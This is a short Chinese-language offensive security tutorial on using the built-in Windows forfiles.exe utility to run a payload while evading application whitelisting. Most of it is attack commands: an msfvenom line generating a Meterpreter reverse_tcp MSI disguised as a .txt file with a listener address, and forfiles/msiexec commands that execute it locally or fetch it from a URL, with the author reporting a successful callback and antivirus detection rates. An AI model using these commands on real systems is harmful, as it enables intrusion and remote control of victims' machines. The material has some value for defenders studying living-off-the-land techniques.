当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 Forfiles.exe介绍
Forfiles是一款windows平台默认安装的文件操作搜索工具之一,可以通过文件名称,修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。
微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11
默认安装位置:
C:\WINDOWS\system32\forfiles.exe
C:\WINDOWS\SysWOW64\forfiles.exe说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。
0x02 利用Forfiles.exe执行payload
使用msfvenom生成msi文件,指定后缀为txt。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.207 LPORT=4444 -f msi > TIDE.txt移动到靶机上执行命令运行
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\Users\administrator\Desktop\TIDE.txt"成功上线。
还可以通过远程访问的形式执行,同样可以成功上线。
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe / q /i http://127.0.0.1/TIDE.txt"打开杀软进行测试。360杀毒,360安全卫士,和火绒都报毒。
vt查杀率34/60
参考链接:
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html
虽然我们生活在阴沟里,但依然有人仰望星空!